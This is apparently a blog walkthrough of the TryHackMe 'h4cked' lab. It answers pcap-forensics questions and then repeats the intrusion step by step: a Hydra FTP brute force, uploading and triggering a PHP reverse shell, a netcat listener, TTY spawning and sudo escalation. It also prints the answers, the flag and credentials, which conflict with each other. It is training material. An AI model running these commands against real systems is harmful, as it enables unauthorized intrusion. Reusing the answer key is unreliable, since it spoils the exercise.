-->

  • TryHackMe h4cked walkthrough


    TryHackMe h4cked walkthrough

     

    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    TryHackMe h4cked walkthrough


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
      


    It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.  TryHackMe h4cked walkthrough


    Let's Start 


    Downloading File Here :- Cick to download wireshark file


    2) The attacker is trying to log into a specific service. What service is this?

    When analyzing the pcap file, we can easily find out that attacker is trying to log into a FTP service as there are many requests and responses from FTP, as shown below.

     

     


     



    Ans :- FTP





    3) There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?

    All you need to answer this question is Google search

     

     


     

     

     

    Ans:- Hydra





    4) The attacker is trying to log on with a specific username. What is the username?

    Simply type the service you found in the first question on Wireshark, and you will find the username that was used to login

     

     

     

     



    Ans :- jenny





    5) What is the user’s password?

    Search a packet that says “login successful” in the info, or you can follow a TCP STREAM of a connection that has ‘login successful’.


     

     
     
     



     

     

     Ans :- password123






    6) What is the current FTP working directory after the attacker logged in?

    We can see in the stream above that the PWD (present working directory) command was run. The response is “/var/www/html”.


      




     

     


    Ans :- /var/www/html





    7) The attacker uploaded a backdoor. What is the backdoor's filename?

    You can find the filename in the above TCP stream as “shell.php”


      


     


    Ans :- shell.php





    8) The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

    To answer this question you need to see the contents of the file that were uploaded. If you apply a display filter and only look at ftp-data you can see two streams. The first will be the directory listing, the second will be the STOR command (file upload).


    If you right-click and follow the second stream you will be able to view the contents of the file and answer the question.






     


    Ans :- http://pentestmonkey.net/tools/php-reverse-shell






    9) Which command did the attacker manually execute after getting a reverse shell?

    You just have to select a packet after executing the shell and follow TCP stream. There you can find all the commands executed by the attacker after getting the reverse shell. Thus, “whoami” is the first manual command executed by him.


     

     

     



    Ans :- whoami





    10) What is the computer’s hostname?

    When looking at the above TCP stream closely, the very first lines descrbes the OS , hostname etc. As Linux is the OS, “wir3” should be the hostname.


      


     


    Ans :- wir3





    11) Which command did the attacker execute to spawn a new TTY shell?

    Anyone with the experience of reverse shells know that we are given with an unstable shell in the first place. We need to make it stable. Most of the time we use a simple Python script to do so. We can see that this attacker also uses the same script when analyzing the above TCP stream.

    Check out Q10) number picture

    Ans:- python3 -c 'import pty; pty.spawn("/bin/bash")'





    12) Which command was executed to gain a root shell?

    The full sudo command that lets you become root user.


      



     

     



    Ans :- sudo su





    13) The attacker downloaded something from GitHub. What is the name of the GitHub project?

    We can see a git clone done by the attacker.(“Reptile” GitHub project). You just have to select a packet after executing the shell and follow TCP stream.


      

     

     



    Ans :- Reptile



    Wireshark in Networking



    Learn Wireshark :- Click Hee





    14) The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

    Follow the HINT


      


     



    Ans:- Rootkit





    Task-2



    1 ) Read the flag.txt file inside the Reptile directory

    There are some steps to get the flag.txt:


    • Step 1)


        Run Hydra to bruteforce the login to the FTP service:

        Type the command - 

     

    hydra -l jenny -P /home/hackerboy/Documents/rockyou.txt ftp://10.10.178.178

     
       
        -l – to use a specific user to login
        -P – the path to the file that contains the list of passwords to try and login





    • Step 2)


    Login to the FTP service using the credentials you found through Hydra. On the terminal just type "ftp 10.10.178.178" without double quotes and then provide the username and password you found when you bruteforce password using Hydra with username


    So, we are now successfully logged in as Jenny.







    • Step 3)


    Find the php reverse shell web shell in your Kali.
     

    locate php-reverse-shell.php







    • 4 Step)


    You can either edit the file in its location or copy it somewhere and edit the IP address(own machine IP address) and port number to set it up to get a reverse shell connection. I choose the edit first in own machine.






    • Step 5)


    Upload the web shell and change the permission with execute rights.

    In the FTP logged in session you are in, type
     

    put php-reverse-shell.php

    ls

    Now we need to change the web shell permission to make it executable, type

    chmod 777 php-reverse-shell.php

    ls

    as you can see, permissions are changed.









    • Step 6)


    let’s start a netcat listener before triggering the webshell, and so we will be able to catch a reverse shell.

    To start a netcat listener, make sure that you use the port number you entered when you edited the webshell in "Step 4", type

    nc -lnvp 1234


    Now, trigger the webshell in own browser by visiting the URL http://10.10.178.178/php-reverse-shell.php and hit enter

    Go back to your netcat listener to check if you have a reverse shell, it's a amazing let's celebtrate but wait we will take some more time.








    • Step 7)


    Switch to a more stable shell, by creating a new TTY shell, type 


    python3 -c 'import pty;pty.spawn("/bin/bash")'


    As for now, we are on “www-data”, which do not have root privileges. We know that Jenny has root privileges on the machine. So, let us change the user to Jenny and become root. It is so much simple as follows.


    su jenny

    password :- 987654321 (using step-1 Hydra)


    we are given a root shell without much effort.
     
    Type sudo -l to check what sudo privileges does user jenny currently have

      




    • Step 8)




    Type sudo su to change user as root and whoami to check if we successfully changed as root or not.

    Look for the /Reptile directory as it was indicated that flag.txt is in that location, type

    find / -type d -name Reptile 2> /dev/null

    Go to the location /root/Reptile and do cat flag.txt to retrieve the content of the flag.txt file









    Ans :- ebcefd66ca4b559d17b440b6e67fd0fd





    Disclaimer

     

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)


     



    • 0 comments:

    Post a Comment

    For Any Tech Updates, Hacking News, Internet, Computer, Technology and related to IT Field Articles Follow Our Blog.